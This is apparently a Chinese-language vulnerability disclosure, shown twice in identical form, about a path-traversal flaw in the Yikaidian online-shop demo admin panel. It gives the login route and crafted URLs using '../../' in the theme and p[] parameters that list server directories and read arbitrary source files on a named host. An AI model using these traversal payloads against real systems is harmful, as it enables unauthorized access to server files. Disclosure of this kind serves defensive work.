VULHUB ™

### 简要描述： 易开店演示站存在遍历文件漏洞，可以读取到任意文件源码。sn ### 详细说明： 首先登陆易开店演示站后台：http://demo.ekaidian.cn/shopadmin/index.php?ctl=passport&act=login 输入官方提供的试用账户，进入页面管理，模板编辑菜单 构造如下url：http://demo.ekaidian.cn/shopadmin/index.php#ctl=system/tmpimage&act=index&theme=../../&istheme=1 其中../../可以任意构造，即可遍历整个服务器 然后通过遍历得知的路径和文件名 即可读取任意文件 例如 http://demo.ekaidian.cn/shopadmin/index.php#ctl=system/template&act=editor&p[0]=../../&p[1]=index.php ### 漏洞证明： [<img src="https://images.seebug.org/upload/201107/180959548019367c5add07f2e55f7d326bd5a9e5.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201107/180959548019367c5add07f2e55f7d326bd5a9e5.jpg)

### 简要描述： 易开店演示站存在遍历文件漏洞，可以读取到任意文件源码。sn ### 详细说明： 首先登陆易开店演示站后台：http://demo.ekaidian.cn/shopadmin/index.php?ctl=passport&act=login 输入官方提供的试用账户，进入页面管理，模板编辑菜单 构造如下url：http://demo.ekaidian.cn/shopadmin/index.php#ctl=system/tmpimage&act=index&theme=../../&istheme=1 其中../../可以任意构造，即可遍历整个服务器 然后通过遍历得知的路径和文件名 即可读取任意文件 例如 http://demo.ekaidian.cn/shopadmin/index.php#ctl=system/template&act=editor&p[0]=../../&p[1]=index.php ### 漏洞证明： [<img src="https://images.seebug.org/upload/201107/180959548019367c5add07f2e55f7d326bd5a9e5.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201107/180959548019367c5add07f2e55f7d326bd5a9e5.jpg)